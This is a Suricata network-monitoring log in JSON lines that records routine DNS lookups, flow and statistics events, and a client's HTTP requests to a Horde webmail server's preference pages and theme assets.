{"timestamp":"2020-02-29T00:25:12.594276+0000","flow_id":1109783837436920,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59784,"proto":"UDP","dns":{"type":"answer","id":16535,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:25:12.665144+0000","flow_id":235487409740482,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":53132,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; 
rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":233,"tx_id":0}} {"timestamp":"2020-02-29T00:25:12.676492+0000","flow_id":235487409740482,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53132,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":4383}} {"timestamp":"2020-02-29T00:25:12.880834+0000","flow_id":235487409740482,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53132,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":4383},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":20182,"tx_id":0}} {"timestamp":"2020-02-29T00:25:12.882591+0000","flow_id":235487409740482,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53132,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/alerts\/success.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux 
x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":469}} {"timestamp":"2020-02-29T00:25:15.000420+0000","flow_id":2114307948884849,"event_type":"flow","src_ip":"192.168.10.122","src_port":38148,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:20:13.602993+0000","end":"2020-02-29T00:20:13.714116+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:25:17.000335+0000","event_type":"stats","stats":{"uptime":15169,"capture":{"kernel_packets":141313,"kernel_drops":0},"decoder":{"pkts":141412,"bytes":97133781,"invalid":195,"ipv4":139825,"ipv6":10,"ethernet":141412,"raw":0,"null":0,"sll":0,"tcp":134257,"udp":5358,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7091008},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2903,"ssn_memcap_drop":0,"pseudo":354,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2919,"synack":2910,"rst":1221,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1911,"ftp":0,"smtp":0,"tls":786,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2450,"failed_udp":116},"tx":{"http":4963,"smtp":0,"tls":0,"dns_
tcp":0,"dns_udp":2534}},"flow_mgr":{"closed_pruned":2873,"new_pruned":17,"est_pruned":2532,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":10897,"memcap_state":0,"memcap_global":0},"http":{"memuse":35665,"memcap":0}}} {"timestamp":"2020-02-29T00:25:17.000998+0000","flow_id":80645229386881,"event_type":"flow","src_ip":"192.168.10.122","src_port":55639,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:20:16.662657+0000","end":"2020-02-29T00:20:16.774063+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:25:17.887686+0000","flow_id":235487409740482,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53132,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/alerts\/success.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":469},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/alerts\/success.png","state":"CLOSED","stored":false,"size":469,"tx_id":1}} {"timestamp":"2020-02-29T00:25:19.023428+0000","flow_id":543208932072324,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":50951,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":35784,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:25:19.131426+0000","flow_id":543208932072324,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50951,"proto":"UDP","dns":{"type":"answer","id":35784,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:25:19.131426+0000","flow_id":543208932072324,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50951,"proto":"UDP","dns":{"type":"answer","id":35784,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:25:19.213257+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53134,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3425}} {"timestamp":"2020-02-29T00:25:21.496587+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53134,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=horde","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3425},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":18034,"tx_id":0}} 
{"timestamp":"2020-02-29T00:25:21.508513+0000","flow_id":1159635523453537,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46389,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64085,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:25:21.616770+0000","flow_id":1159635523453537,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46389,"proto":"UDP","dns":{"type":"answer","id":64085,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:25:21.616770+0000","flow_id":1159635523453537,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46389,"proto":"UDP","dns":{"type":"answer","id":64085,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:25:21.742083+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53134,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3799}} {"timestamp":"2020-02-29T00:25:21.795448+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53134,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3799},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":20554,"tx_id":1}} {"timestamp":"2020-02-29T00:25:21.799324+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53134,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2951}} {"timestamp":"2020-02-29T00:25:21.802311+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53134,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2951},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/screen.css","state":"CLOSED","stored":false,"size":12657,"tx_id":2}} {"timestamp":"2020-02-29T00:25:21.802660+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53134,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/basic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1633}} {"timestamp":"2020-02-29T00:25:21.834936+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53134,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/basic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1633},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/basic\/screen.css","state":"CLOSED","stored":false,"size":6255,"tx_id":3}} {"timestamp":"2020-02-29T00:25:21.835707+0000","flow_id":1482449560383490,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53138,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-right-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":161}} {"timestamp":"2020-02-29T00:25:21.833550+0000","flow_id":1291220436495971,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53136,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-center-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":103}} {"timestamp":"2020-02-29T00:25:21.877288+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53134,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-left-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":179}} {"timestamp":"2020-02-29T00:25:21.887524+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53134,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-left-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":179},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-left-active.png","state":"CLOSED","stored":false,"size":179,"tx_id":4}} {"timestamp":"2020-02-29T00:25:21.888085+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53134,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742}} {"timestamp":"2020-02-29T00:25:22.002635+0000","flow_id":412190935165934,"event_type":"flow","src_ip":"192.168.10.122","src_port":60597,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:20:21.601070+0000","end":"2020-02-29T00:20:21.712317+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:25:24.000418+0000","event_type":"stats","stats":{"uptime":15176,"capture":{"kernel_packets":141522,"kernel_drops":0},"decoder":{"pkts":141561,"bytes":97241089,"invalid":195,"ipv4":139974,"ipv6":10,"ethernet":141561,"raw":0,"null":0,"sll":0,"tcp":134402,"udp":5362,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7091872},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2906,"ssn_memcap_drop":0,"pseudo":354,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2922,"synack":2913,"rst":1221,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1914,"ftp":0,"smtp":0,"tls":786,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2452,"failed_udp":116},"tx":{"http":4971,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2536}},"flow_mgr":{"closed_pruned":2873,"new_pruned":17,"est_pruned":2
534,"bypassed_pruned":0,"flows_checked":4,"flows_notimeout":3,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65532,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":10897,"memcap_state":0,"memcap_global":0},"http":{"memuse":105136,"memcap":0}}} {"timestamp":"2020-02-29T00:25:24.162555+0000","flow_id":33615357704955,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":34990,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":56920,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:25:24.190806+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53134,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/graphics\/favicon.ico","state":"CLOSED","stored":false,"size":1742,"tx_id":5}} {"timestamp":"2020-02-29T00:25:24.271143+0000","flow_id":33615357704955,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34990,"proto":"UDP","dns":{"type":"answer","id":56920,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:25:24.271143+0000","flow_id":33615357704955,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":34990,"proto":"UDP","dns":{"type":"answer","id":56920,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:25:24.383397+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53134,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp&group=delmove","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5316}} {"timestamp":"2020-02-29T00:25:24.444426+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53134,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp&group=delmove","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5316},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":23007,"tx_id":6}} {"timestamp":"2020-02-29T00:25:24.446802+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53134,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/folderprefs.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":852}} 
{"timestamp":"2020-02-29T00:25:26.838842+0000","flow_id":1291220436495971,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53136,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-center-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":103},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-center-active.png","state":"CLOSED","stored":false,"size":103,"tx_id":0}} {"timestamp":"2020-02-29T00:25:26.839002+0000","flow_id":1482449560383490,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53138,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/navi-right-active.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":161},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/navi-right-active.png","state":"CLOSED","stored":false,"size":161,"tx_id":0}} {"timestamp":"2020-02-29T00:25:29.451829+0000","flow_id":541469470307065,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53134,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/js\/folderprefs.js?v=29c8308baa6508a21e1be9e3345d1287","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":852},"app_proto":"http","fileinfo":{"filename":"\/imp\/js\/folderprefs.js","state":"CLOSED","stored":false,"size":1991,"tx_id":7}} {"timestamp":"2020-02-29T00:25:31.000257+0000","event_type":"stats","stats":{"uptime":15183,"capture":{"kernel_packets":141589,"kernel_drops":0},"decoder":{"pkts":141593,"bytes":97251200,"invalid":195,"ipv4":140006,"ipv6":10,"ethernet":141593,"raw":0,"null":0,"sll":0,"tcp":134432,"udp":5364,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7092160},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2906,"ssn_memcap_drop":0,"pseudo":354,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2922,"synack":2913,"rst":1221,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1914,"ftp":0,"smtp":0,"tls":786,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2453,"failed_udp":116},"tx":{"http":4973,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2537}},"flow_mgr":{"closed_pruned":2873,"new_pruned":17,"est_pruned":2534,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":1,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":11227,"memca
p_state":0,"memcap_global":0},"http":{"memuse":1280,"memcap":0}}} {"timestamp":"2020-02-29T00:25:32.000516+0000","flow_id":210589465948869,"event_type":"flow","src_ip":"192.168.10.122","src_port":35430,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:20:31.635589+0000","end":"2020-02-29T00:20:31.746740+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:25:32.001504+0000","flow_id":2045171861543121,"event_type":"flow","src_ip":"192.168.10.122","src_port":49402,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:20:31.841937+0000","end":"2020-02-29T00:20:31.950688+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:25:33.660270+0000","flow_id":1715253968442158,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":38186,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":14725,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:25:33.768730+0000","flow_id":1715253968442158,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38186,"proto":"UDP","dns":{"type":"answer","id":14725,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:25:33.768730+0000","flow_id":1715253968442158,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38186,"proto":"UDP","dns":{"type":"answer","id":14725,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
